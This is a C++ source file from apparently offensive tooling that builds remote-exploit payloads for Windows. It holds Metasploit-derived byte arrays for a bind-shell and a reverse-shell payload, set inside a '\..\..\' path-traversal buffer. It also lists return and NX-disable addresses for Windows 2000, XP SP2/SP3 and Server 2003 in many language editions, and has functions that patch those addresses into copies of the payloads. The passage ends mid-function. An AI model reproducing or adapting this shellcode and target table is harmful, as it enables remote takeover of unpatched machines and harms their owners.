/*
 * Author: thirdstormofcythraul@outlook.com
 */
#include "payload.h"

#include <stdlib.h>

#include <string.h>

#include "print.h"
#include "global.h"
#include "macro.h"

#include "memory_debug.h"


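// Payload templates, taken from Metasploit.
// Each array below is a fixed, pre-generated byte buffer whose contents are opaque
// in this file. The only structure readable from the bytes is a UTF-16LE "\..\..\"
// sequence (0x5c,0x00,0x2e,0x00,0x2e,0x00,...) and a run of trailing zero bytes.
// createCmdPayload() and createShellPayload() overwrite bytes 530-537 and 542-545
// in a heap copy of cmdpayload / reverseShellPayload.

// "Open a port" payload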
unsigned char Payload::cmdpayload[] = {
	0x5c,0x00,0x59,0x76,
	0x42,0x44,0x56,0x4b,
	0x47,0x4f,0x62,0x69,
	0x69,0x44,0x4d,0x61,
	0x6c,0x5a,0x41,0x50,
	0x52,0x6c,0x44,0x41,
	0x4d,0x4a,0x64,0x68,
	0x4f,0x65,0x73,0x62,
	0x69,0x45,0x6a,0x64,
	0x77,0x6e,0x43,0x50,
	0x68,0x5a,0x50,0x42,
	0x78,0x48,0x42,0x69,
	0x47,0x42,0x4b,0x67,
	0x6a,0x46,0x48,0x4b,
	0x59,0x5a,0x71,0x5a,
	0x6c,0x63,0x62,0x50,
	0x64,0x4f,0x72,0x58,
	0x77,0x76,0x44,0x54,
	0x56,0x54,0x58,0x4e,
	0x64,0x51,0x59,0x62,
	0x4a,0x79,0x6d,0x66,
	0x4d,0x41,0x56,0x62,
	0x6e,0x58,0x71,0x66,
	0x71,0x73,0x63,0x53,
	0x67,0x46,0x79,0x55,
	0x59,0x58,0xf9,0x74,
	0x1d,0x8d,0x77,0x4e,
	0x86,0xfc,0x66,0x27,
	0x9f,0x7c,0x35,0x74,
	0x3f,0x7e,0x4b,0x71,
	0x09,0xd3,0xc1,0xe0,
	0x14,0xb5,0x9b,0x7d,
	0x1c,0xa8,0xb2,0x76,
	0x15,0x78,0x47,0xb9,
	0x77,0x42,0xb1,0x72,
	0x05,0x75,0x04,0x7f,
	0x3d,0xb3,0x73,0x28,
	0xe2,0x3c,0x81,0xeb,
	0x25,0x88,0xe1,0x2c,
	0x96,0xb9,0xe3,0x42,
	0xf9,0x91,0x97,0x7a,
	0x04,0x92,0x99,0x4f,
	0x7b,0x37,0x3f,0x10,
	0xd4,0x70,0x2d,0xba,
	0x35,0x79,0x1d,0x0c,
	0x67,0xb6,0x4e,0x41,
	0x02,0xfc,0x7c,0x14,
	0x1c,0x32,0xd6,0xb8,
	0xb1,0xa9,0x4a,0x34,
	0x43,0xf5,0x48,0x9f,
	0x90,0xbf,0x46,0x93,
	0x49,0x27,0x05,0xbb,
	0x47,0xfd,0x20,0xd5,
	0xb0,0xb5,0xb4,0x15,
	0x4b,0xa8,0x24,0x8d,
	0xbe,0x0b,0xf8,0x66,
	0x98,0xb7,0xb2,0x9b,
	0x6a,0x3f,0x59,0xd9,
	0xee,0xd9,0x74,0x24,
	0xf4,0x5b,0x81,0x73,
	0x13,0xeb,0xc8,0xb2,
	0x91,0x83,0xeb,0xfc,
	0xe2,0xf4,0x6a,0x0c,
	0xe6,0x63,0x14,0x37,
	0x33,0x75,0x1b,0x37,
	0x4d,0x6e,0x17,0x20,
	0x3b,0x91,0xeb,0xc8,
	0xd2,0x18,0x0e,0xf9,
	0x60,0xf5,0x60,0x9a,
	0x82,0x1a,0xb9,0xc4,
	0x39,0xc3,0xff,0x43,
	0xc0,0xb9,0xe4,0x7f,
	0xf8,0xb7,0xda,0x37,
	0x83,0x51,0x47,0xf4,
	0xd3,0xed,0xe9,0xe4,
	0x92,0x50,0x24,0xc5,
	0xb3,0x56,0x09,0x38,
	0xe0,0xc6,0x60,0x9a,
	0xa2,0x1a,0xa9,0xf4,
	0xb3,0x41,0x60,0x88,
	0xca,0x14,0x2b,0xbc,
	0xf8,0x90,0x3b,0x98,
	0x39,0xd9,0xf3,0x43,
	0xea,0xb1,0xea,0x1b,
	0x51,0xad,0xa2,0x43,
	0x86,0x1a,0xea,0x1e,
	0x83,0x6e,0xda,0x08,
	0x1e,0x50,0x24,0xc5,
	0xb3,0x56,0xd3,0x28,
	0xc7,0x65,0xe8,0xb5,
	0x4a,0xaa,0x96,0xec,
	0xc7,0x73,0xb3,0x43,
	0xea,0xb5,0xea,0x1b,
	0xd4,0x1a,0xe7,0x83,
	0x39,0xc9,0xf7,0xc9,
	0x61,0x1a,0xef,0x43,
	0xb3,0x41,0x62,0x8c,
	0x96,0xb5,0xb0,0x93,
	0xd3,0xc8,0xb1,0x99,
	0x4d,0x71,0xb3,0x97,
	0xe8,0x1a,0xf9,0x23,
	0x34,0xcc,0x81,0xc9,
	0x3f,0x14,0x52,0xc8,
	0xb2,0x91,0xbb,0xa0,
	0x83,0x1a,0x84,0x4f,
	0x4d,0x44,0x50,0x28,
	0xaf,0xbb,0xe1,0xa0,
	0x14,0x04,0x56,0x55,
	0x4d,0x44,0xd7,0xce,
	0xce,0x9b,0x6b,0x33,
	0x52,0xe4,0xee,0x73,
	0xf5,0x82,0x99,0xa7,
	0xd8,0x91,0xb8,0x37,
	0x67,0xff,0x8e,0xbc,
	0xc1,0xf9,0xcb,0xae,
	0xdb,0xe3,0x8e,0xbf,
	0xd3,0xfd,0x87,0xe8,
	0xd3,0xf5,0x8f,0xe8,
	0xc2,0xfe,0x99,0xbc,
	0xdd,0xe1,0x8e,0xa6,
	0xdb,0xff,0x8c,0xe8,
	0xe6,0xd2,0xbb,0xe8,
	0x87,0xa0,0xde,0xfd,
	0x92,0xe2,0x9b,0xa7,
	0xdd,0xfd,0x98,0xc8,
	0xb2,0x91,0x5c,0x00,
	0x2e,0x00,0x2e,0x00,
	0x5c,0x00,0x2e,0x00,
	0x2e,0x00,0x5c,0x00,
	0x41,0x00,0x4a,0x00,
	0x50,0x00,0x5a,0x00,
	0x57,0x00,0x59,0x00,
	0x4b,0x00,0x08,0x04,
	0x02,0x00,0xc2,0x17,
	0x5c,0x59,0x50,0x46,
	0x43,0x4b,0x07,0xf8,
	0x5b,0x59,0x47,0x46,
	0x49,0x4a,0x5a,0x41,
	0x42,0x44,0x49,0x51,
	0x4a,0x4c,0x4a,0x52,
	0x46,0x5a,0x4b,0x44,
	0x55,0x48,0x57,0x51,
	0x49,0x44,0x4d,0x53,
	0x4c,0x47,0x58,0x5a,
	0x58,0x54,0x57,0x52,
	0x4c,0x48,0x5a,0x4b,
	0x53,0x55,0x4b,0x42,
	0x0c,0x91,0x42,0x13,
	0xd5,0x3f,0x43,0x99,
	0xeb,0x62,0x49,0x47,
	0x42,0x53,0x52,0x41,
	0x4e,0x47,0x44,0x58,
	0x00,0x00,0x00,0x00
};

	unsigned char Payload::shellPayloadSp2[] =        {
		0x5c,0x00,0x6a,0x79,0x77,0x55,0x58,0x69,
		0x6b,0x4d,0x49,0x53,0x79,0x6d,0x76,0x6e,
		0x76,0x70,0x4b,0x76,0x58,0x54,0x4c,0x47,
		0x63,0x76,0x67,0x51,0x59,0x56,0x75,0x51,
		0x59,0x58,0x6f,0x6b,0x79,0x53,0x61,0x62,
		0x79,0x6e,0x64,0x44,0x48,0x69,0x71,0x53,
		0x4b,0x48,0x6a,0x42,0x59,0x6b,0x49,0x58,
		0x51,0x75,0x57,0x62,0x69,0x50,0x42,0x42,
		0x6d,0x78,0x6f,0x53,0x6d,0x4f,0x63,0x54,
		0x64,0x69,0x79,0x61,0x75,0x54,0x70,0x64,
		0x6c,0x72,0x77,0x4e,0x63,0x64,0x49,0x51,
		0x77,0x64,0x46,0x42,0x50,0x54,0x45,0x6b,
		0x4e,0x64,0x62,0x6f,0x64,0x7a,0xbb,0x27,
		0x67,0xf5,0xbe,0x99,0x90,0x34,0x2d,0xb9,
		0x37,0x35,0x4b,0x66,0x4f,0x97,0x05,0x3c,
		0x49,0xb0,0x47,0xfd,0x6a,0x59,0x59,0xd9,
		0xee,0xd9,0x74,0x24,0xf4,0x5b,0x81,0x73,
		0x13,0x85,0x92,0x22,0xf0,0x83,0xeb,0xfc,
		0xe2,0xf4,0x04,0x56,0x76,0x02,0x7a,0x6d,
		0xa3,0x14,0x75,0x6d,0xdd,0x0f,0x79,0x7a,
		0xab,0xf0,0x85,0x92,0x42,0x79,0x60,0xa3,
		0xf0,0x94,0x0e,0xc0,0x12,0x7b,0xd7,0x9e,
		0xa9,0xa2,0x91,0x19,0x50,0xd8,0x8a,0x25,
		0x68,0xd6,0xb4,0x6d,0x13,0x30,0x29,0xae,
		0x43,0x8c,0x87,0xbe,0x02,0x31,0x4a,0x9f,
		0x23,0x37,0x67,0x62,0x70,0xa7,0x0e,0xc0,
		0x32,0x7b,0xc7,0xae,0x23,0x20,0x0e,0xd2,
		0x5a,0x75,0x45,0xe6,0x68,0xf1,0x55,0xc2,
		0xa9,0xb8,0x9d,0x19,0x7a,0xd0,0x84,0x41,
		0xc1,0xcc,0xcc,0x19,0x16,0x7b,0x84,0x44,
		0x13,0x0f,0xb4,0x52,0x8e,0x31,0x4a,0x9f,
		0x23,0x37,0xbd,0x72,0x57,0x04,0x86,0xef,
		0xda,0xcb,0xf8,0xb6,0x57,0x12,0xdd,0x19,
		0x7a,0xd4,0x84,0x41,0x44,0x7b,0x89,0xd9,
		0xa9,0xa8,0x99,0x93,0xf1,0x7b,0x81,0x19,
		0x23,0x20,0x0c,0xd6,0x06,0xd4,0xde,0xc9,
		0x43,0xa9,0xdf,0xc3,0xdd,0x10,0xdd,0xcd,
		0x78,0x7b,0x97,0x79,0xa4,0xad,0xed,0xa1,
		0x10,0xf0,0x85,0xfa,0x55,0x83,0xb7,0xcd,
		0x76,0x98,0xc9,0xe5,0x04,0xf7,0x7a,0x47,
		0x9a,0x60,0x84,0x92,0x22,0xd9,0x41,0xc6,
		0x72,0x98,0xac,0x12,0x49,0xf0,0x7a,0x47,
		0x72,0xa0,0xd5,0xc2,0x62,0xa0,0xc5,0xc2,
		0x4a,0x1a,0x8a,0x4d,0xc2,0x0f,0x50,0x1b,
		0xe5,0xc1,0x5e,0xc1,0x4a,0xf2,0x85,0x86,
		0x01,0x79,0x63,0xf8,0x32,0xa6,0xd2,0xfa,
		0xe0,0x2b,0xb2,0xf5,0xdd,0x25,0xd6,0xc5,
		0x4a,0x47,0x6c,0xaa,0xdd,0x0f,0x50,0xc1,
		0x71,0xa7,0xed,0xe6,0xce,0xcb,0x64,0x6d,
		0xf7,0xa7,0x0c,0x55,0x4a,0x85,0xeb,0xdf,
		0x43,0x0f,0x50,0xfa,0x41,0x9d,0xe1,0x92,
		0xab,0x13,0xd2,0xc5,0x75,0xc1,0x73,0xf8,
		0x30,0xa9,0xd3,0x70,0xdf,0x96,0x42,0xd6,
		0x06,0xcc,0x84,0x93,0xaf,0xb4,0xa1,0x82,
		0xe4,0xf0,0xc1,0xc6,0x72,0xa6,0xd3,0xc4,
		0x64,0xa6,0xcb,0xc4,0x74,0xa3,0xd3,0xfa,
		0x5b,0x3c,0xba,0x14,0xdd,0x25,0x0c,0x72,
		0x6c,0xa6,0xc3,0x6d,0x12,0x98,0x8d,0x15,
		0x3f,0x90,0x7a,0x47,0x99,0x10,0x98,0xb8,
		0x28,0x98,0x23,0x07,0x9f,0x6d,0x7a,0x47,
		0x1e,0xf6,0xf9,0x98,0xa2,0x0b,0x65,0xe7,
		0x27,0x4b,0xc2,0x81,0x50,0x9f,0xef,0x92,
		0x71,0x0f,0x50,0x92,0x22,0xf0,0x5c,0x00,
		0x2e,0x00,0x2e,0x00,0x5c,0x00,0x2e,0x00,
		0x2e,0x00,0x5c,0x00,0x41,0x00,0x55,0x00,
		0x49,0x00,0x51,0x00,0x48,0x00,0x53,0x00,
		0x43,0x00,0x08,0x04,0x02,0x00,0xe2,0x16,
		0x89,0x6f,0x45,0x41,0x58,0x4d,0x27,0xf7,
		0x88,0x6f,0x59,0x53,0x41,0x45,0x55,0x53,
		0x56,0x48,0x53,0x4b,0x47,0x4c,0x42,0x45,
		0x49,0x47,0x44,0x43,0x50,0x4f,0x52,0x47,
		0x45,0x51,0x4b,0x57,0x43,0x4d,0x42,0x43,
		0x4b,0x45,0x4c,0x47,0x4c,0x4a,0x41,0x48,
		0x41,0x58,0x5a,0x46,0xb2,0x35,0x96,0xb8,
		0x46,0x27,0x3a,0xfd,0xeb,0x62,0x59,0x41,
		0x44,0x49,0x4c,0x44,0x5a,0x57,0x45,0x45,
		0x00,0x00,0x00,0x00};

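		// Reverse-shell payload template. The original note says "bind on 5155"; whether 5155 is a
		// listening port or a connect-back port cannot be confirmed from this file (the bytes are opaque here).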
		unsigned char Payload::reverseShellPayload[] =        {
			0x5c,0x00,0x51,0x77,
			0x4b,0x54,0x74,0x4c,
			0x6a,0x77,0x44,0x62,
			0x49,0x46,0x67,0x6e,
			0x68,0x63,0x43,0x46,
			0x7a,0x77,0x69,0x47,
			0x74,0x73,0x64,0x76,
			0x45,0x69,0x42,0x68,
			0x48,0x42,0x75,0x52,
			0x63,0x51,0x72,0x74,
			0x44,0x6d,0x57,0x47,
			0x6b,0x61,0x6b,0x46,
			0x73,0x42,0x66,0x4a,
			0x6f,0x51,0x53,0x4e,
			0x6b,0x5a,0x46,0x50,
			0x46,0x46,0x74,0x62,
			0x67,0x78,0x48,0x73,
			0x6b,0x69,0x7a,0x4e,
			0x6f,0x6f,0x48,0x66,
			0x6a,0x66,0x45,0x59,
			0x71,0x48,0x48,0x43,
			0x58,0x62,0x70,0x63,
			0x61,0x45,0x69,0x4f,
			0x46,0x50,0x43,0x55,
			0x75,0x52,0x42,0x65,
			0x48,0x48,0x46,0x47,
			0x22,0xd5,0x99,0x43,
			0x35,0xb9,0x96,0x25,
			0xb8,0x2c,0xb3,0x2d,
			0xba,0x66,0xb7,0xbb,
			0xb1,0x4b,0x67,0x97,
			0x6a,0x59,0x59,0xd9,
			0xee,0xd9,0x74,0x24,
			0xf4,0x5b,0x81,0x73,
			0x13,0x30,0xaa,0x51,
			0x4d,0x83,0xeb,0xfc,
			0xe2,0xf4,0xb1,0x6e,
			0x05,0xbf,0xcf,0x55,
			0xd0,0xa9,0xc0,0x55,
			0xae,0xb2,0xcc,0x42,
			0xd8,0x4d,0x30,0xaa,
			0x31,0xc4,0xd5,0x9b,
			0x83,0x29,0xbb,0xf8,
			0x61,0xc6,0x62,0xa6,
			0xda,0x1f,0x24,0x21,
			0x23,0x65,0x3f,0x1d,
			0x1b,0x6b,0x01,0x55,
			0x60,0x8d,0x9c,0x96,
			0x30,0x31,0x32,0x86,
			0x71,0x8c,0xff,0xa7,
			0x50,0x8a,0xd2,0x5a,
			0x03,0x1a,0xbb,0xf8,
			0x41,0xc6,0x72,0x96,
			0x50,0x9d,0xbb,0xea,
			0x29,0xc8,0xf0,0xde,
			0x1b,0x4c,0xe0,0xfa,
			0xda,0x05,0x28,0x21,
			0x09,0x6d,0x31,0x79,
			0xb2,0x71,0x79,0x21,
			0x65,0xc6,0x31,0x7c,
			0x60,0xb2,0x01,0x6a,
			0xfd,0x8c,0xff,0xa7,
			0x50,0x8a,0x08,0x4a,
			0x24,0xb9,0x33,0xd7,
			0xa9,0x76,0x4d,0x8e,
			0x24,0xaf,0x68,0x21,
			0x09,0x69,0x31,0x79,
			0x37,0xc6,0x3c,0xe1,
			0xda,0x15,0x2c,0xab,
			0x82,0xc6,0x34,0x21,
			0x50,0x9d,0xb9,0xee,
			0x75,0x69,0x6b,0xf1,
			0x30,0x14,0x6a,0xfb,
			0xae,0xad,0x68,0xf5,
			0x0b,0xc6,0x22,0x41,
			0xd7,0x10,0x58,0x99,
			0x63,0x4d,0x30,0xc2,
			0x26,0x3e,0x02,0xf5,
			0x05,0x25,0x7c,0xdd,
			0x77,0x4a,0xcf,0x7f,
			0xe9,0xdd,0x31,0xaa,
			0x51,0x64,0xf4,0xfe,
			0x01,0x25,0x19,0x2a,
			0x3a,0x4d,0xcf,0x7f,
			0x01,0x1d,0x60,0xfa,
			0x11,0x1d,0x70,0xfa,
			0x39,0xa7,0x3f,0x75,
			0xb1,0xb2,0xe5,0x23,
			0x96,0x7c,0xeb,0xf9,
			0x39,0x4f,0x30,0xbe,
			0x72,0xc4,0xd6,0xc0,
			0x41,0x1b,0x67,0xc2,
			0x93,0x96,0x07,0xcd,
			0xae,0x98,0x63,0xfd,
			0x39,0xfa,0xd9,0x92,
			0xae,0xb2,0xe5,0xf9,
			0x02,0x1a,0x58,0xde,
			0xbd,0x76,0xd1,0x55,
			0x84,0x1a,0xb9,0x6d,
			0x39,0x38,0x5e,0xe7,
			0x30,0xb2,0xe5,0xc2,
			0x32,0x20,0x54,0xaa,
			0xd8,0xae,0x67,0xfd,
			0x06,0x7c,0xc6,0xc0,
			0x43,0x14,0x66,0x48,
			0xac,0x2b,0xf7,0xee,
			0x75,0x71,0x31,0xab,
			0xdc,0x09,0x14,0xba,
			0x97,0x4d,0x74,0xfe,
			0x01,0x1b,0x66,0xfc,
			0x17,0x1b,0x7e,0xfc,
			0x07,0x1e,0x66,0xc2,
			0x28,0x81,0x0f,0x2c,
			0xae,0x98,0xb9,0x4a,
			0x1f,0x1b,0x76,0x55,
			0x61,0x25,0x38,0x2d,
			0x4c,0x2d,0xcf,0x7f,
			0xea,0xad,0x2d,0x80,
			0x5b,0x25,0x96,0x3f,
			0xec,0xd0,0xcf,0x7f,
			0x6d,0x4b,0x4c,0xa0,
			0xd1,0xb6,0xd0,0xdf,
			0x54,0xf6,0x77,0xb9,
			0x23,0x22,0x5a,0xaa,
			0x02,0xb2,0xe5,0xaa,
			0x51,0x4d,0x5c,0x00,
			0x2e,0x00,0x2e,0x00,
			0x5c,0x00,0x2e,0x00,
			0x2e,0x00,0x5c,0x00,
			0x41,0x00,0x4b,0x00,
			0x44,0x00,0x45,0x00,
			0x42,0x00,0x43,0x00,
			0x4a,0x00,0x08,0x04,
			0x02,0x00,0xc2,0x17,
			0x5c,0x59,0x4a,0x42,
			0x57,0x44,0x07,0xf8,
			0x5b,0x59,0x53,0x48,
			0x49,0x4f,0x4d,0x59,
			0x48,0x46,0x4c,0x45,
			0x48,0x51,0x52,0x55,
			0x44,0x52,0x49,0x43,
			0x49,0x50,0x4e,0x50,
			0x4f,0x54,0x49,0x4f,
			0x51,0x47,0x4c,0x42,
			0x54,0x5a,0x48,0x53,
			0x53,0x55,0x58,0x55,
			0x4a,0x53,0x44,0x51,
			0xbe,0xb0,0x9b,0x12,
			0xd4,0xb6,0x37,0x3f,
			0xeb,0x62,0x4c,0x44,
			0x42,0x56,0x50,0x4e,
			0x46,0x56,0x44,0x56,
			0x00,0x00,0x00,0x00
		};

		struct Payload::Rop Payload::ropsOthers[] = {//Windows 2000 Universal
			{
				0x00,0x1f,0x1c,0xb0,
					0x00,0x02,0x04,0x08,
					0x00,0x1f,0x1c,0xb0
			},//Windows XP SP0/SP1 Universal
			{
				0x01,0x00,0x13,0x61,
					0x00,0x02,0x04,0x08,
					0x01,0x00,0x13,0x61
				},
				{//Windows 2003 SP0 Universal
					0x01,0x00,0x12,0x9e,
						0x00,0x02,0x04,0x08,
						0x01,0x00,0x12,0x9e
				},
				{//Windows 2003 SP1 English (NO NX)
					0x71,0xbf,0x21,0xa2,
						0x00,0x02,0x04,0x08,
						0x71,0xbf,0x21,0xa2
					},
					{//Windows 2003 SP1 Japanese (NO NX)
						0x71,0xa9,0x21,0xa2,
							0x00,0x02,0x04,0x08,
							0x71,0xa9,0x21,0xa2
					},
					{//Windows 2003 SP2 English (NO NX)
						0x71,0xbf,0x39,0x69,
							0x00,0x02,0x04,0x08,
							0x71,0xbf,0x39,0x69
						},
						{//Windows 2003 SP2 German (NO NX)
							0x71,0xa0,0x39,0x69,
								0x00,0x02,0x04,0x08,
								0x71,0xa0,0x39,0x69
						}
		};

		struct Payload::Rop Payload::ropsXp2[] = {//English
			{
				0x6f,0x88,0xf7,0x27,
					0x6f,0x89,0x16,0xe2,
					0x00,0x02,0x04,0x08
			},
			{//Spanish
				0x6f,0xdb,0xf7,0x27,
					0x6f,0xdc,0x16,0xe2,
					0x00,0x02,0x04,0x08
				},
				{//Italian
					0x59,0x6b,0xf7,0x27,
						0x59,0x6c,0x16,0xe2,
						0x00,0x02,0x04,0x08
				},
				{//French
					0x59,0x5b,0xf7,0x27,
						0x59,0x5c,0x16,0xe2,
						0x00,0x02,0x04,0x08
					},
					{//German
						0x6f,0xd9,0xf7,0x27,
							0x6f,0xda,0x16,0xe2,
							0x00,0x02,0x04,0x08
					},
					{//Brazilian
						0x59,0x6f,0xf7,0x27,
							0x59,0x70,0x16,0xe2,
							0x00,0x02,0x04,0x08
						},
						{//Portuguese
							0x59,0x6b,0xf7,0x27,
								0x59,0x6c,0x16,0xe2,
								0x00,0x02,0x04,0x08
						},
						{//Hungarian
							0x59,0x70,0xf7,0x27,
								0x59,0x71,0x16,0xe2,
								0x00,0x02,0x04,0x08
							},
							{//Finnish
								0x59,0x7d,0xf7,0x27,
									0x59,0x7e,0x16,0xe2,
									0x00,0x02,0x04,0x08
							},
							{//Dutch
								0x59,0x6c,0xf7,0x27,
									0x59,0x6d,0x16,0xe2,
									0x00,0x02,0x04,0x08	
								},
								{//Danish
									0x59,0x78,0xf7,0x27,
										0x59,0x79,0x16,0xe2,
										0x00,0x02,0x04,0x08
								},
								{//Swedish
									0x59,0x7a,0xf7,0x27,
										0x59,0x7b,0x16,0xe2,
										0x00,0x02,0x04,0x08	
									},
									{//Polish
										0x59,0x41,0xf7,0x27,
											0x59,0x42,0x16,0xe2,
											0x00,0x02,0x04,0x08
									},
									{//Czech
										0x6f,0xe1,0xf7,0x27,
											0x6f,0xe2,0x16,0xe2,
											0x00,0x02,0x04,0x08	
										},
										{//Turkish
											0x5a,0x78,0xf7,0x27,
												0x5a,0x79,0x16,0xe2,
												0x00,0x02,0x04,0x08
										},
										{//Japanese
											0x56,0x7f,0xd3,0xbe,
												0x56,0x80,0x16,0xe2,
												0x00,0x02,0x04,0x08	
											},
											{//Chinese
												0x58,0xfb,0xf7,0x27,
													0x58,0xfc,0x16,0xe2,
													0x00,0x02,0x04,0x08
											},
											{//Taiwan
												0x58,0x60,0xf7,0x27,
													0x58,0x61,0x16,0xe2,
													0x00,0x02,0x04,0x08	
												},
												{//Korean
													0x6f,0xd6,0xf7,0x27,
														0x6f,0xd7,0x16,0xe2,
														0x00,0x02,0x04,0x08
												},
												{//Russian
													0x6f,0xe1,0xf7,0x27,
														0x6f,0xe2,0x16,0xe2,
														0x00,0x02,0x04,0x08
													}
		};

		struct Payload::Rop Payload::ropsXp3[] = {//English
			{
				0x6f,0x88,0xf8,0x07,
					0x6f,0x89,0x17,0xc2,
					0x00,0x02,0x04,0x08
			},
			{//Spanish
				0x6f,0xdb,0xf8,0x07,
					0x6f,0xdc,0x17,0xc2,
					0x00,0x02,0x04,0x08
				},
				{//Italian
					0x59,0x6b,0xf8,0x07,
						0x59,0x6c,0x17,0xc2,
						0x00,0x02,0x04,0x08
				},
				{//French
					0x59,0x5b,0xf8,0x07,
						0x59,0x5c,0x17,0xc2,
						0x00,0x02,0x04,0x08
					},
					{//German
						0x6f,0xd9,0xf8,0x07,
							0x6f,0xda,0x17,0xc2,
							0x00,0x02,0x04,0x08
					},	{//Brazilian
						0x59,
							0x6f,
							0xf8,
							0x07,
							0x59,
							0x70,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					}
					,
					{//Portuguese
						0x59,
							0x6b,
							0xf8,
							0x07,
							0x59,
							0x6c,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					},	{//Hungarian
						0x59,
							0x70,
							0xf8,
							0x07,
							0x59,
							0x71,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
					},	{//Finnish
						0x59,
							0x7d,
							0xf8,
							0x07,
							0x59,
							0x7e,
							0x17,
							0xc2,
							0x00,
							0x02,
							0x04,
							0x08
						},	{//Dutch
							0x59,
								0x6c,
								0xf8,
								0x07,
								0x59,
								0x6d,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
						},	{//Danish
							0x59,
								0x78,
								0xf8,
								0x07,
								0x59,
								0x79,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
						},	{//Swedish
							0x59,
								0x7a,
								0xf8,
								0x07,
								0x59,
								0x7b,
								0x17,
								0xc2,
								0x00,
								0x02,
								0x04,
								0x08
							},	{//Polish
								0x59,
									0x41,
									0xf8,
									0x07,
									0x59,
									0x42,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
							},	{//Czech
								0x6f,
									0xe1,
									0xf8,
									0x07,
									0x6f,
									0xe2,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
							},	{//Turkish
								0x5a,
									0x78,
									0xf8,
									0x07,
									0x5a,
									0x79,
									0x17,
									0xc2,
									0x00,
									0x02,
									0x04,
									0x08
								},	{//Japanese
									0x56,
										0x7f,
										0xd4,
										0xd2,
										0x56,
										0x80,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
								},{//Chinese
									0x58,
										0x60,
										0xf8,
										0x07,
										0x58,
										0x61,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
								},{//Taiwan
									0x58,
										0x60,
										0xf8,
										0x07,
										0x58,
										0x61,
										0x17,
										0xc2,
										0x00,
										0x02,
										0x04,
										0x08
									},{//Korean
										0x6f,
											0xd6,
											0xf8,
											0x07,
											0x6f,
											0xd7,
											0x17,
											0xc2,
											0x00,
											0x02,
											0x04,
											0x08
									},{//Russian
										0x6f,
											0xe1,
											0xf8,
											0x07,
											0x6f,
											0xe2,
											0x17,
											0xc2,
											0x00,
											0x02,
											0x04,
											0x08
									}
		};

		/**
		 * Debug helper: prints three 4-byte fields of a payload buffer as hex.
		 *
		 * The fields sit at the same offsets that createShellPayload() and
		 * createCmdPayload() write: "scratch" at 530-533, "disablenx" at 534-537
		 * and "ret" at 542-545. Each field is printed from its highest offset
		 * down to its lowest, under a label line.
		 *
		 * @param payload  Buffer to inspect. It is indexed up to offset 545 with no
		 *                 length or null check, so it must hold at least 546 bytes.
		 */
		void Payload::showRop(unsigned char* payload){
			// Offset of the first (lowest-addressed) byte of each field.
			enum { kScratchAt = 530, kDisableNxAt = 534, kRetAt = 542 };

			MYPRINTF( "\n\t\tscratch\n");
			MYPRINTF( "\t\t%02X", payload[kScratchAt + 3]);
			MYPRINTF( "%02X", payload[kScratchAt + 2]);
			MYPRINTF( "%02X", payload[kScratchAt + 1]);
			MYPRINTF( "%02X", payload[kScratchAt]);

			MYPRINTF( "\n\t\tdisablenx\n");
			MYPRINTF( "\t\t%02X", payload[kDisableNxAt + 3]);
			MYPRINTF( "%02X", payload[kDisableNxAt + 2]);
			MYPRINTF( "%02X", payload[kDisableNxAt + 1]);
			MYPRINTF( "%02X", payload[kDisableNxAt]);

			MYPRINTF( "\n\t\tret\n");
			MYPRINTF( "\t\t%02X", payload[kRetAt + 3]);
			MYPRINTF( "%02X", payload[kRetAt + 2]);
			MYPRINTF( "%02X", payload[kRetAt + 1]);
			MYPRINTF( "%02X", payload[kRetAt]);

			MYPRINTF( "\n");
		}

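		/**
		 * Returns a heap copy of the reverseShellPayload template with the three
		 * fields of @p rop written into it.
		 *
		 * The copy is one byte shorter than the template (sizeof - 1). Each 4-byte
		 * field of @p rop is stored in reverse byte order: element [0] goes to the
		 * highest offset of its slot and element [3] to the lowest.
		 *   - rop.scratch   -> offsets 530-533
		 *   - rop.disablenx -> offsets 534-537
		 *   - rop.ret       -> offsets 542-545
		 *
		 * @param rop  Source of the three 4-byte fields; only elements [0]..[3] of
		 *             each field are read.
		 * @return Buffer allocated with malloc(); the caller owns it and must free()
		 *         it. NULL if the allocation fails (the original code copied into
		 *         the unchecked pointer).
		 */
		unsigned char * Payload::createShellPayload(struct Payload::Rop rop){
			// Offset of the first (lowest-addressed) byte of each slot in the copy.
			enum { kScratchAt = 530, kDisableNxAt = 534, kRetAt = 542, kFieldSize = 4 };

			const size_t length = sizeof(Payload::reverseShellPayload) - 1;

			unsigned char* buffer = static_cast<unsigned char*>(malloc(length));
			if (buffer == NULL) {
				// Do not memcpy through a failed allocation.
				return NULL;
			}
			memcpy(buffer, Payload::reverseShellPayload, length);

			// Byte i of each rop field lands at (slot start + 3 - i).
			for (int i = 0; i < kFieldSize; ++i) {
				const int mirrored = kFieldSize - 1 - i;
				buffer[kScratchAt + mirrored] = rop.scratch[i];
				buffer[kDisableNxAt + mirrored] = rop.disablenx[i];
				buffer[kRetAt + mirrored] = rop.ret[i];
			}

			return buffer;
		}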

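		/**
		 * Returns a heap copy of the cmdpayload template with the three fields of
		 * @p rop written into it.
		 *
		 * The copy is one byte shorter than the template (sizeof - 1). Each 4-byte
		 * field of @p rop is stored in reverse byte order: element [0] goes to the
		 * highest offset of its slot and element [3] to the lowest.
		 *   - rop.scratch   -> offsets 530-533
		 *   - rop.disablenx -> offsets 534-537
		 *   - rop.ret       -> offsets 542-545
		 *
		 * @param rop  Source of the three 4-byte fields; only elements [0]..[3] of
		 *             each field are read.
		 * @return Buffer allocated with malloc(); the caller owns it and must free()
		 *         it. NULL if the allocation fails (the original code copied into
		 *         the unchecked pointer).
		 */
		unsigned char * Payload::createCmdPayload(struct Rop rop){
			// Offset of the first (lowest-addressed) byte of each slot in the copy.
			enum { kScratchAt = 530, kDisableNxAt = 534, kRetAt = 542, kFieldSize = 4 };

			const size_t length = sizeof(Payload::cmdpayload) - 1;

			unsigned char* buffer = static_cast<unsigned char*>(malloc(length));
			if (buffer == NULL) {
				// Do not memcpy through a failed allocation.
				return NULL;
			}
			memcpy(buffer, Payload::cmdpayload, length);

			// Byte i of each rop field lands at (slot start + 3 - i).
			for (int i = 0; i < kFieldSize; ++i) {
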